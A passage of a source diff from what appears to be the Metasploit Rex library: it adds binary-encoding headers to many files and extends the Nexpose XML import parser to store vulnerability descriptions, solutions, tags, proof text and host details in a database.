--- a/lib/rex/parser/apple_backup_manifestdb.rb
+++ b/lib/rex/parser/apple_backup_manifestdb.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
#
# This is a Ruby port of the Python manifest parsing code posted to:
# http://stackoverflow.com/questions/3085153/how-to-parse-the-manifest-mbdb-file-in-an-ios-4-0-itunes-backup/3130860#3130860
diff --git a/lib/rex/parser/appscan_nokogiri.rb b/lib/rex/parser/appscan_nokogiri.rb
index ffa8e26779..27ced30d15 100644
--- a/lib/rex/parser/appscan_nokogiri.rb
+++ b/lib/rex/parser/appscan_nokogiri.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require "rex/parser/nokogiri_doc_mixin"
module Rex
diff --git a/lib/rex/parser/arguments.rb b/lib/rex/parser/arguments.rb
index e63b14e0b8..7796ed3623 100644
--- a/lib/rex/parser/arguments.rb
+++ b/lib/rex/parser/arguments.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'shellwords'
module Rex
diff --git a/lib/rex/parser/arguments.rb.ut.rb b/lib/rex/parser/arguments.rb.ut.rb
index 81f0ce8953..49a1549a5a 100644
--- a/lib/rex/parser/arguments.rb.ut.rb
+++ b/lib/rex/parser/arguments.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/parser/burp_session_nokogiri.rb b/lib/rex/parser/burp_session_nokogiri.rb
index 02285cc4b1..829d3d4abe 100644
--- a/lib/rex/parser/burp_session_nokogiri.rb
+++ b/lib/rex/parser/burp_session_nokogiri.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require "rex/parser/nokogiri_doc_mixin"
module Rex
diff --git a/lib/rex/parser/ci_nokogiri.rb b/lib/rex/parser/ci_nokogiri.rb
index 4cbcb361eb..a394303bbd 100644
--- a/lib/rex/parser/ci_nokogiri.rb
+++ b/lib/rex/parser/ci_nokogiri.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require "rex/parser/nokogiri_doc_mixin"
require 'msf/core'
diff --git a/lib/rex/parser/foundstone_nokogiri.rb b/lib/rex/parser/foundstone_nokogiri.rb
index b6581e9bdc..fd880fa2da 100644
--- a/lib/rex/parser/foundstone_nokogiri.rb
+++ b/lib/rex/parser/foundstone_nokogiri.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require "rex/parser/nokogiri_doc_mixin"
module Rex
diff --git a/lib/rex/parser/fusionvm_nokogiri.rb b/lib/rex/parser/fusionvm_nokogiri.rb
index b0cd12ff57..dd990cc110 100644
--- a/lib/rex/parser/fusionvm_nokogiri.rb
+++ b/lib/rex/parser/fusionvm_nokogiri.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require "rex/parser/nokogiri_doc_mixin"
module Rex
diff --git a/lib/rex/parser/ini.rb b/lib/rex/parser/ini.rb
index aa8ec45394..da7d14d354 100644
--- a/lib/rex/parser/ini.rb
+++ b/lib/rex/parser/ini.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Parser
diff --git a/lib/rex/parser/ini.rb.ut.rb b/lib/rex/parser/ini.rb.ut.rb
index 1890c1f34e..002384dbcf 100644
--- a/lib/rex/parser/ini.rb.ut.rb
+++ b/lib/rex/parser/ini.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/parser/ip360_aspl_xml.rb b/lib/rex/parser/ip360_aspl_xml.rb
index 988c2b2641..700045c413 100644
--- a/lib/rex/parser/ip360_aspl_xml.rb
+++ b/lib/rex/parser/ip360_aspl_xml.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rexml/document'
require 'rex/ui'
diff --git a/lib/rex/parser/ip360_xml.rb b/lib/rex/parser/ip360_xml.rb
index 6045a23ded..ffb0b5f35f 100644
--- a/lib/rex/parser/ip360_xml.rb
+++ b/lib/rex/parser/ip360_xml.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rexml/document'
require 'rex/ui'
diff --git a/lib/rex/parser/mbsa_nokogiri.rb b/lib/rex/parser/mbsa_nokogiri.rb
index 593fc20590..fd6ab13e77 100644
--- a/lib/rex/parser/mbsa_nokogiri.rb
+++ b/lib/rex/parser/mbsa_nokogiri.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require "rex/parser/nokogiri_doc_mixin"
module Rex
diff --git a/lib/rex/parser/nessus_xml.rb b/lib/rex/parser/nessus_xml.rb
index 14919e6404..fd3e33a1d2 100644
--- a/lib/rex/parser/nessus_xml.rb
+++ b/lib/rex/parser/nessus_xml.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rexml/document'
require 'rex/ui'
diff --git a/lib/rex/parser/netsparker_xml.rb b/lib/rex/parser/netsparker_xml.rb
index b1307830ac..005d413a59 100644
--- a/lib/rex/parser/netsparker_xml.rb
+++ b/lib/rex/parser/netsparker_xml.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Parser
diff --git a/lib/rex/parser/nexpose_raw_nokogiri.rb b/lib/rex/parser/nexpose_raw_nokogiri.rb
index 2f852a7258..b7892e5762 100644
--- a/lib/rex/parser/nexpose_raw_nokogiri.rb
+++ b/lib/rex/parser/nexpose_raw_nokogiri.rb
@@ -1,4 +1,6 @@
+# -*- coding: binary -*-
require "rex/parser/nokogiri_doc_mixin"
+require "date"
module Rex
module Parser
@@ -10,6 +12,13 @@ module Rex
attr_reader :tests
+ NEXPOSE_HOST_DETAIL_FIELDS = %W{ nx_device_id nx_site_name nx_site_importance nx_scan_template nx_risk_score }
+ NEXPOSE_VULN_DETAIL_FIELDS = %W{
+ nx_scan_id
+ nx_vulnerable_since
+ nx_pci_compliance_status
+ }
+
# Triggered every time a new element is encountered. We keep state
# ourselves with the @state variable, turning things on when we
# get here (and turning things off when we exit in end_element()).
@@ -19,12 +28,13 @@ module Rex
@state[:current_tag][name] = true
case name
when "nodes" # There are two main sections, nodes and VulnerabilityDefinitions
- @tests = []
+ @tests = {}
when "node"
record_host(attrs)
when "name"
@state[:has_text] = true
when "endpoint"
+ @state.delete(:cached_service_object)
record_service(attrs)
when "service"
record_service_info(attrs)
@@ -33,6 +43,7 @@ module Rex
when "os"
record_os_fingerprint(attrs)
when "test" # All the vulns tested for
+ @state[:has_text] = true
record_host_test(attrs)
record_service_test(attrs)
when "vulnerability"
@@ -40,6 +51,27 @@ module Rex
when "reference"
@state[:has_text] = true
record_reference(attrs)
+ when "description"
+ @state[:has_text] = true
+ record_vuln_description(attrs)
+ when "solution"
+ @state[:has_text] = true
+ record_vuln_solution(attrs)
+ when "tag"
+ @state[:has_text] = true
+ when "tags"
+ @state[:tags] = []
+ #
+ # These are markup tags only present within description/solutions
+ #
+ when "ContainerBlockElement", # Overall container, no formatting
+ "Paragraph", #
+ "UnorderedList", # List container (bulleted)
+ "ListItem", # List item
+ "URLLink" # KB 887429
+
+ record_formatted_content(name, attrs)
+
end
end
@@ -58,12 +90,16 @@ module Rex
when "name"
collect_hostname
@state[:has_text] = false
+ @text = nil
when "endpoint"
collect_service_data
+ @state.delete(:cached_service_object)
when "os"
collect_os_fingerprints
when "test"
- save_test
+ report_test(&block)
+ @state[:has_text] = false
+ @text = nil
when "vulnerability"
collect_vuln_info
report_vuln(&block)
@@ -72,6 +108,31 @@ module Rex
@state[:has_text] = false
collect_reference
@text = nil
+ when "description"
+ @state[:has_text] = false
+ collect_vuln_description
+ @text = nil
+ when "solution"
+ @state[:has_text] = false
+ collect_vuln_solution
+ @text = nil
+ when "tag"
+ @state[:has_text] = false
+ collect_tag
+ @text = nil
+ when "tags"
+ @report_data[:vuln_tags] = @state[:tags]
+ @state.delete(:tags)
+ #
+ # These are markup tags only present within description/solutions
+ #
+ when "ContainerBlockElement", # Overall container, no formatting
+ "Paragraph", #
+ "UnorderedList", # List container (bulleted)
+ "ListItem", # List item
+ "URLLink" # KB 887429
+
+ collect_formatted_content(name)
end
@state[:current_tag].delete name
end
@@ -86,6 +147,29 @@ module Rex
@state[:ref] = nil
end
+ def collect_vuln_description
+ return unless in_tag("description")
+ return unless in_tag("vulnerability")
+ return unless @state[:vuln]
+ @report_data[:vuln_description] = clean_formatted_text( @report_data[:vuln_description_stack].join.strip )
+ end
+
+ def collect_vuln_solution
+ return unless in_tag("solution")
+ return unless in_tag("vulnerability")
+ return unless @state[:vuln]
+ @report_data[:vuln_solution] = clean_formatted_text( @report_data[:vuln_solution_stack].join.strip )
+ end
+
+ def collect_tag
+ return unless in_tag("tag")
+ return unless in_tag("tags")
+ return unless in_tag("vulnerability")
+ return unless @state[:vuln]
+ @state[:tags] ||= []
+ @state[:tags] << @text.to_s.strip
+ end
+
def collect_vuln_info
return unless in_tag("VulnerabilityDefinitions")
return unless in_tag("vulnerability")
@@ -101,49 +185,57 @@ module Rex
return unless in_tag("VulnerabilityDefinitions")
return unless @report_data[:vuln]
return unless @report_data[:vuln][:matches].kind_of? Array
+
+ ::ActiveRecord::Base.connection_pool.with_connection {
+
refs = normalize_references(@report_data[:vuln][:refs])
refs << "NEXPOSE-#{report_data[:vuln]["id"]}"
vuln_instances = @report_data[:vuln][:matches].size
db.emit(:vuln, [refs.last,vuln_instances], &block) if block
- data = {
- :workspace => @args[:wspace],
- :name => refs.last,
- :info => @report_data[:vuln]["title"],
- :refs => refs.uniq
- }
- hosts_keys = {}
- @report_data[:vuln][:matches].each do |match|
- host_data = data.dup
- host_data[:host] = match[:host]
- host_data[:port] = match[:port] if match[:port]
- host_data[:proto] = match[:protocol] if match[:protocol]
- db_report(:vuln, host_data)
- if match[:key]
- hosts_keys[host_data[:host]] ||= []
- hosts_keys[host_data[:host]] << match[:key]
- end
- end
- report_key_note(hosts_keys,data)
- @report_data[:vuln] = nil
- end
- def report_key_note(hosts_keys,data)
- return if hosts_keys.empty?
- hosts_keys.each do |key_host,key_values|
- key_note = {
- :workspace => @args[:wspace],
- :host => key_host,
- :type => "host.vuln.nexpose_keys",
- :data => {},
- :update => :unique_data
- }
- key_values.each do |key_value|
- key_note[:data][data[:name]] ||= []
- next if key_note[:data][data[:name]].include? key_value
- key_note[:data][data[:name]] << key_value
+ vuln_ids = @report_data[:vuln][:matches].map{ |v| v[0] }
+ vdet_ids = @report_data[:vuln][:matches].map{ |v| v[1] }
+
+ refs = refs.uniq.map{|x| db.find_or_create_ref(:name => x) }
+
+ # Assign title and references to all vuln_ids
+ # Mass update fails due to the join table || ::Mdm::Vuln.where(:id => vuln_ids).update_all({ :name => @report_data[:vuln]["title"], :refs => refs } )
+ vuln_ids.each do |vid|
+ vuln = ::Mdm::Vuln.find(vid)
+ next unless vuln
+ vuln.name = @report_data[:vuln]["title"]
+
+ if refs.length > 0
+ vuln.refs += refs
+ end
+
+ if vuln.changed?
+ vuln.save!
end
- db_report(:note, key_note)
end
+
+ # Mass update vulnerability details across the database based on conditions
+ vdet_info = { :title => @report_data[:vuln]["title"] }
+ vdet_info[:description] = @report_data[:vuln_description] unless @report_data[:vuln_description].to_s.empty?
+ vdet_info[:solution] = @report_data[:vuln_solution] unless @report_data[:vuln_solution].to_s.empty?
+ vdet_info[:nx_tags] = @report_data[:vuln_tags].sort.uniq.join(", ") if ( @report_data[:vuln_tags].kind_of?(::Array) and @report_data[:vuln_tags].length > 0 )
+ vdet_info[:nx_severity] = @report_data[:vuln]["severity"].to_f if @report_data[:vuln]["severity"]
+ vdet_info[:nx_pci_severity] = @report_data[:vuln]["pciSeverity"].to_f if @report_data[:vuln]["pciSeverity"]
+ vdet_info[:cvss_score] = @report_data[:vuln]["cvssScore"].to_f if @report_data[:vuln]["cvssScore"]
+ vdet_info[:cvss_vector] = @report_data[:vuln]["cvssVector"] if @report_data[:vuln]["cvssVector"]
+
+ %W{ published added modified }.each do |tf|
+ next if not @report_data[:vuln][tf]
+ ts = DateTime.parse(@report_data[:vuln][tf]) rescue nil
+ next if not ts
+ vdet_info[ "nx_#{tf}".to_sym ] = ts
+ end
+
+ ::Mdm::VulnDetail.where(:id => vdet_ids).update_all(vdet_info)
+
+ @report_data[:vuln] = nil
+
+ }
end
def record_reference(attrs)
@@ -155,22 +247,202 @@ module Rex
def record_vuln(attrs)
return unless in_tag("VulnerabilityDefinitions")
vuln = attr_hash(attrs)
- matching_tests = @tests.select {|x| x[:id] == vuln["id"].downcase}
+ matching_tests = @tests[ vuln["id"].downcase ]
+ return unless matching_tests
return if matching_tests.empty?
@state[:vuln] = vuln
@state[:vuln][:matches] = matching_tests
end
- def save_test
+ def record_vuln_description(attrs)
+ @report_data[:vuln_description_stack] = []
+ end
+
+ def record_vuln_solution(attrs)
+ @report_data[:vuln_solution_stack] = []
+ end
+
+
+ def record_formatted_content(name, eattrs)
+ attrs = attr_hash(eattrs)
+ stack = nil
+
+ if in_tag("solution")
+ stack = @report_data[:vuln_solution_stack]
+ end
+
+ if in_tag("description")
+ stack = @report_data[:vuln_description_stack]
+ end
+
+ if in_tag("test")
+ stack = @report_data[:vuln_proof_stack]
+ end
+
+ return if not stack
+
+ @report_data[:formatted_indent] ||= 0
+
+ data = @text.to_s.strip.split(/\n+/).map{|t| t.strip}.join(" ")
+ @text = ""
+
+ case name
+ when 'ListItem'
+ @report_data[:formatted_indent] = 1
+ # data = "\n* " + data
+ when 'URLLink'
+ @report_data[:formatted_link] = attrs["LinkURL"]
+ else
+
+ if @report_data[:formatted_indent] > 1
+ data = (" " * (@report_data[:formatted_indent])) + data
+ end
+
+ if @report_data[:formatted_indent] == 1
+ @report_data[:formatted_indent] = 6
+ end
+ end
+
+ if data.length > 0
+ stack << data
+ end
+ end
+
+ def collect_formatted_content(name)
+ stack = nil
+ prefix = ""
+
+ if in_tag("solution")
+ stack = @report_data[:vuln_solution_stack]
+ end
+
+ if in_tag("description")
+ stack = @report_data[:vuln_description_stack]
+ end
+
+ if in_tag("test")
+ stack = @report_data[:vuln_proof_stack]
+ end
+
+ return if not stack
+
+ data = @text.to_s.strip.split(/\n+/).map{|t| t.strip}.join(" ")
+ @text = ""
+
+ case name
+ when 'URLLink'
+ if @report_data[:formatted_link]
+ if data != @report_data[:formatted_link]
+ if data.empty?
+ data << (" " + @report_data[:formatted_link])
+ else
+ data = " " + data + " ( " + @report_data[:formatted_link] + " )"
+ end
+ end
+ end
+ when 'Paragraph'
+ data << "\n\n"
+ when 'ListItem'
+ @report_data[:formatted_indent] = 0
+ data << "\n"
+ end
+
+ if data.length > 0
+ stack << data
+ end
+ end
+
+ # XML Export 2.0 includes additional test keys:
+ #
+
+ def report_test
return unless in_tag("nodes")
return unless in_tag("node")
return unless @state[:test]
- test = { :id => @state[:test][:id]}
- test[:host] = @state[:address]
- test[:port] = @state[:test][:port] if @state[:test][:port]
- test[:protocol] = @state[:test][:protocol] if @state[:test][:protocol]
- test[:key] = @state[:test][:key] if @state[:test][:key]
- @tests << test
+
+ vuln_info = {
+ :workspace => @args[:wspace],
+ # This name will be overwritten during the vuln definition
+ # parsing via mass-update.
+ :name => "NEXPOSE-" + @state[:test][:id].downcase,
+ :host => @state[:cached_host_object] || @state[:address]
+ }
+
+ if in_tag("endpoint") and @state[:test][:port]
+ # Verify this port actually has some relation to our tracked state
+ # since it may not due to greedy vulnerability matching
+ if @state[:cached_service_object] and @state[:cached_service_object].port.to_i == @state[:test][:port].to_i
+ vuln_info[:service] = @state[:cached_service_object]
+ else
+ vuln_info[:port] = @state[:test][:port]
+ vuln_info[:proto] = @state[:test][:protocol] if @state[:test][:protocol]
+ end
+ end
+
+ # This hash feeds a vuln_details row for this vulnerability
+ vdet = { :src => 'nexpose', :nx_vuln_id => @state[:test][:id] }
+
+ # This hash defines the matching criteria to overwrite an existing entry
+ vkey = { :src => 'nexpose', :nx_vuln_id => @state[:test][:id] }
+
+ if @state[:nx_device_id]
+ vdet[:nx_device_id] = @state[:nx_device_id]
+ vkey[:nx_device_id] = @state[:nx_device_id]
+ end
+
+ if @state[:test][:key]
+ vdet[:nx_proof_key] = @state[:test][:key]
+ vkey[:nx_proof_key] = @state[:test][:key]
+ end
+
+ vdet[:nx_console_id] = @nx_console_id if @nx_console_id
+ vdet[:nx_vuln_status] = @state[:test][:status] if @state[:test][:status]
+
+ vdet[:nx_scan_id] = @state[:test][:nx_scan_id] if @state[:test][:nx_scan_id]
+ vdet[:nx_pci_compliance_status] = @state[:test][:nx_pci_compliance_status] if @state[:test][:nx_pci_compliance_status]
+
+ if @state[:test][:nx_vulnerable_since]
+ ts = ::DateTime.parse(@state[:test][:nx_vulnerable_since]) rescue nil
+ vdet[:nx_vulnerable_since] = ts if ts
+ end
+
+ proof = clean_formatted_text(@report_data[:vuln_proof_stack].join.strip)
+ @report_data[:vuln_proof_stack] = []
+
+ vuln_info[:info] = proof
+ vdet[:proof] = proof
+
+ # Configure the find key for vuln_details
+ vdet[:key] = vkey
+
+ # Pass this key to the vuln hash to find existing entries
+ # that may have been renamed (re-import nexpose vulns)
+ vuln_info[:details_match] = vkey
+
+ ::ActiveRecord::Base.connection_pool.with_connection {
+
+ # Report the vulnerability
+ vuln = db.report_vuln(vuln_info)
+
+ if vuln
+ # Report the vulnerability details
+ detail = db.report_vuln_details(vuln, vdet)
+
+ # Cache returned host and service objects if necessary
+ @state[:cached_host_object] ||= vuln.host
+
+ # The vuln.service may be found via greedy matching
+ if in_tag("endpoint") and vuln.service
+ @state[:cached_service_object] ||= vuln.service
+ end
+
+ # Record the ID of this vuln for a future mass update that
+ # brings in title, risk, description, solution, etc
+ @tests[ @state[:test][:id].downcase ] ||= []
+ @tests[ @state[:test][:id].downcase ] << [ vuln.id, detail.id ]
+ end
+
+ }
@state[:test] = nil
end
@@ -275,7 +547,7 @@ module Rex
if state[:service]["name"] == ""
sname = nil
else
- sname = db.nmap_msf_service_map(@state[:service]["name"])
+ sname = db.service_name_map(@state[:service]["name"])
end
port_hash[:name] = sname
end
@@ -302,10 +574,16 @@ module Rex
return unless in_tag("node")
return if in_tag("service")
return unless in_tag("tests")
+
test = attr_hash(attrs)
return unless actually_vulnerable(test)
@state[:test] = {:id => test["id"].downcase}
@state[:test][:key] = test["key"] if test["key"]
+ @state[:test][:nx_scan_id] = test["scan-id"] if test["scan-id"]
+ @state[:test][:nx_vulnerable_since] = test["vulnerable-since"] if test["vulnerable-since"]
+ @state[:test][:nx_pci_compliance_status] = test["pci-compliance-status"] if test["pci-compliance-status"]
+
+ @report_data[:vuln_proof_stack] = []
end
def record_service_test(attrs)
@@ -321,6 +599,11 @@ module Rex
:protocol => @state[:service]["protocol"],
}
@state[:test][:key] = test["key"] if test["key"]
+ @state[:test][:status] = test["status"] if test["status"]
+ @state[:test][:nx_scan_id] = test["scan-id"] if test["scan-id"]
+ @state[:test][:nx_vulnerable_since] = test["vulnerable-since"] if test["vulnerable-since"]
+ @state[:test][:nx_pci_compliance_status] = test["pci-compliance-status"] if test["pci-compliance-status"]
+ @report_data[:vuln_proof_stack] = []
end
def record_host(attrs)
@@ -330,6 +613,14 @@ module Rex
@state[:host_is_alive] = true
@state[:address] = host_attrs["address"]
@state[:mac] = host_attrs["hardware-address"] if host_attrs["hardware-address"]
+
+ NEXPOSE_HOST_DETAIL_FIELDS.each do |f|
+ fs = f.to_sym
+ fk = f.sub(/^nx_/, '').gsub('_', '-')
+ if host_attrs[fk]
+ @state[fs] = host_attrs[fk]
+ end
+ end
end
end
@@ -345,20 +636,49 @@ module Rex
@report_data[:mac] = @state[:mac]
end
end
+
+ NEXPOSE_HOST_DETAIL_FIELDS.each do |f|
+ v = @state[f.to_sym]
+ @report_data[f.to_sym] = v if v
+ end
end
def report_host(&block)
if host_is_okay
db.emit(:address,@report_data[:host],&block) if block
- host_object = db_report(:host, @report_data.merge(
- :workspace => @args[:wspace] ) )
+ device_id = @report_data[:nx_device_id]
+
+ host_object = db_report(:host, @report_data.merge(:workspace => @args[:wspace] ) )
if host_object
db.report_import_note(host_object.workspace, host_object)
+ if device_id
+ detail = {
+ :key => { :src => 'nexpose' },
+ :src => 'nexpose',
+ :nx_device_id => device_id
+ }
+ detail[:nx_console_id] = @nx_console_id if @nx_console_id
+
+ NEXPOSE_HOST_DETAIL_FIELDS.each do |f|
+ v = @report_data.delete(f.to_sym)
+ detail[f.to_sym] = v if v
+ end
+
+
+ db.report_host_details(host_object, detail)
+ end
end
host_object
end
end
+ def clean_formatted_text(txt)
+ txt.split(/\n/).map{ |t|
+ t.sub(/^\s+$/, '').
+ sub(/^(\s{6,20})/, ' ')
+ }.join("\n").gsub(/\n{4,10}/, "\n\n\n")
+ end
+
end
end
diff --git a/lib/rex/parser/nexpose_simple_nokogiri.rb b/lib/rex/parser/nexpose_simple_nokogiri.rb
index 54751ffbdd..126194b278 100644
--- a/lib/rex/parser/nexpose_simple_nokogiri.rb
+++ b/lib/rex/parser/nexpose_simple_nokogiri.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require "rex/parser/nokogiri_doc_mixin"
module Rex
diff --git a/lib/rex/parser/nexpose_xml.rb b/lib/rex/parser/nexpose_xml.rb
index 2903eaeedb..1d3dd85f57 100644
--- a/lib/rex/parser/nexpose_xml.rb
+++ b/lib/rex/parser/nexpose_xml.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Parser
diff --git a/lib/rex/parser/nmap_nokogiri.rb b/lib/rex/parser/nmap_nokogiri.rb
index a0ba49a744..19dca7c728 100644
--- a/lib/rex/parser/nmap_nokogiri.rb
+++ b/lib/rex/parser/nmap_nokogiri.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require "rex/parser/nokogiri_doc_mixin"
module Rex
diff --git a/lib/rex/parser/nmap_xml.rb b/lib/rex/parser/nmap_xml.rb
index e26545d36c..f8a19fa6f0 100644
--- a/lib/rex/parser/nmap_xml.rb
+++ b/lib/rex/parser/nmap_xml.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rexml/document'
diff --git a/lib/rex/parser/nokogiri_doc_mixin.rb b/lib/rex/parser/nokogiri_doc_mixin.rb
index 65e1312c90..10a1557c95 100644
--- a/lib/rex/parser/nokogiri_doc_mixin.rb
+++ b/lib/rex/parser/nokogiri_doc_mixin.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Parser
@@ -49,6 +50,7 @@ module Parser
@state[:current_tag] = {}
@block = block if block
@report_data = {:wspace => args[:wspace]}
+ @nx_console_id = args[:nx_console_id]
super()
end
@@ -149,7 +151,11 @@ module Parser
[:host, :host_name, :mac, :workspace]
when :vuln
::Mdm::Vuln.new.attribute_names.map {|x| x.to_sym} |
- [:host, :refs, :workspace, :port, :proto]
+ [:host, :refs, :workspace, :port, :proto, :details, :exploited_at]
+ when :vuln_details
+ ::Mdm::VulnDetails.new.attribute_names.map {|x| x.to_sym} | [ :key ]
+ when :host_details
+ ::Mdm::HostDetails.new.attribute_names.map {|x| x.to_sym} | [ :key ]
when :note, :web_site, :web_page, :web_form, :web_vuln
# These guys don't complain
[:anything]
diff --git a/lib/rex/parser/openvas_nokogiri.rb b/lib/rex/parser/openvas_nokogiri.rb
index d55826f613..fd043023ba 100644
--- a/lib/rex/parser/openvas_nokogiri.rb
+++ b/lib/rex/parser/openvas_nokogiri.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require "rex/parser/nokogiri_doc_mixin"
module Rex
diff --git a/lib/rex/parser/retina_xml.rb b/lib/rex/parser/retina_xml.rb
index 485ca15080..4c34cde91e 100644
--- a/lib/rex/parser/retina_xml.rb
+++ b/lib/rex/parser/retina_xml.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Parser
diff --git a/lib/rex/parser/wapiti_nokogiri.rb b/lib/rex/parser/wapiti_nokogiri.rb
index 4acb93a0cc..d9aad2d461 100644
--- a/lib/rex/parser/wapiti_nokogiri.rb
+++ b/lib/rex/parser/wapiti_nokogiri.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require "rex/parser/nokogiri_doc_mixin"
module Rex
diff --git a/lib/rex/payloads.rb b/lib/rex/payloads.rb
index 1b9315643a..eedb44076b 100644
--- a/lib/rex/payloads.rb
+++ b/lib/rex/payloads.rb
@@ -1 +1,2 @@
+# -*- coding: binary -*-
require 'rex/payloads/win32'
diff --git a/lib/rex/payloads/win32.rb b/lib/rex/payloads/win32.rb
index 563607516f..e7bf68e4f2 100644
--- a/lib/rex/payloads/win32.rb
+++ b/lib/rex/payloads/win32.rb
@@ -1,2 +1,3 @@
+# -*- coding: binary -*-
require 'rex/payloads/win32/common'
require 'rex/payloads/win32/kernel'
diff --git a/lib/rex/payloads/win32/common.rb b/lib/rex/payloads/win32/common.rb
index a46926bf5c..bfd8b663d2 100644
--- a/lib/rex/payloads/win32/common.rb
+++ b/lib/rex/payloads/win32/common.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Payloads
module Win32
diff --git a/lib/rex/payloads/win32/kernel.rb b/lib/rex/payloads/win32/kernel.rb
index 1bd9b9da07..ac1ad92ec1 100644
--- a/lib/rex/payloads/win32/kernel.rb
+++ b/lib/rex/payloads/win32/kernel.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Payloads
module Win32
diff --git a/lib/rex/payloads/win32/kernel/common.rb b/lib/rex/payloads/win32/kernel/common.rb
index d671e0c498..bdff6a7afb 100644
--- a/lib/rex/payloads/win32/kernel/common.rb
+++ b/lib/rex/payloads/win32/kernel/common.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Payloads
module Win32
diff --git a/lib/rex/payloads/win32/kernel/migration.rb b/lib/rex/payloads/win32/kernel/migration.rb
index 4e3ee264b8..bae8f41a03 100644
--- a/lib/rex/payloads/win32/kernel/migration.rb
+++ b/lib/rex/payloads/win32/kernel/migration.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Payloads
module Win32
diff --git a/lib/rex/payloads/win32/kernel/recovery.rb b/lib/rex/payloads/win32/kernel/recovery.rb
index e57dce5fbf..b9825eafc1 100644
--- a/lib/rex/payloads/win32/kernel/recovery.rb
+++ b/lib/rex/payloads/win32/kernel/recovery.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Payloads
module Win32
diff --git a/lib/rex/payloads/win32/kernel/stager.rb b/lib/rex/payloads/win32/kernel/stager.rb
index 927556736f..d961864349 100644
--- a/lib/rex/payloads/win32/kernel/stager.rb
+++ b/lib/rex/payloads/win32/kernel/stager.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Payloads
module Win32
diff --git a/lib/rex/peparsey.rb b/lib/rex/peparsey.rb
index d938a68fde..6e6addffe7 100644
--- a/lib/rex/peparsey.rb
+++ b/lib/rex/peparsey.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# $Id$
diff --git a/lib/rex/peparsey/exceptions.rb b/lib/rex/peparsey/exceptions.rb
index 0a4ecd80df..45951f8322 100644
--- a/lib/rex/peparsey/exceptions.rb
+++ b/lib/rex/peparsey/exceptions.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# $Id$
diff --git a/lib/rex/peparsey/pe.rb b/lib/rex/peparsey/pe.rb
index bad65cdc82..3966e06f0b 100644
--- a/lib/rex/peparsey/pe.rb
+++ b/lib/rex/peparsey/pe.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# $Id$
diff --git a/lib/rex/peparsey/pe_memdump.rb b/lib/rex/peparsey/pe_memdump.rb
index 8adfbfb446..cf72ce5397 100644
--- a/lib/rex/peparsey/pe_memdump.rb
+++ b/lib/rex/peparsey/pe_memdump.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# $Id$
diff --git a/lib/rex/peparsey/pebase.rb b/lib/rex/peparsey/pebase.rb
index dbb7359921..cb0af219e2 100644
--- a/lib/rex/peparsey/pebase.rb
+++ b/lib/rex/peparsey/pebase.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# $Id$
diff --git a/lib/rex/peparsey/section.rb b/lib/rex/peparsey/section.rb
index 0e9873c5fa..dfec34e7a7 100644
--- a/lib/rex/peparsey/section.rb
+++ b/lib/rex/peparsey/section.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# $Id$
diff --git a/lib/rex/pescan.rb b/lib/rex/pescan.rb
index 32099b9e44..163c6f0db5 100644
--- a/lib/rex/pescan.rb
+++ b/lib/rex/pescan.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# $Id$
diff --git a/lib/rex/pescan/analyze.rb b/lib/rex/pescan/analyze.rb
index 38361d90a6..7a125776d4 100644
--- a/lib/rex/pescan/analyze.rb
+++ b/lib/rex/pescan/analyze.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module PeScan
module Analyze
diff --git a/lib/rex/pescan/scanner.rb b/lib/rex/pescan/scanner.rb
index b010a32edb..01e83bfd55 100644
--- a/lib/rex/pescan/scanner.rb
+++ b/lib/rex/pescan/scanner.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'metasm'
module Rex
diff --git a/lib/rex/pescan/search.rb b/lib/rex/pescan/search.rb
index 4214c1afb5..1202fd3bad 100644
--- a/lib/rex/pescan/search.rb
+++ b/lib/rex/pescan/search.rb
@@ -1,3 +1,4 @@
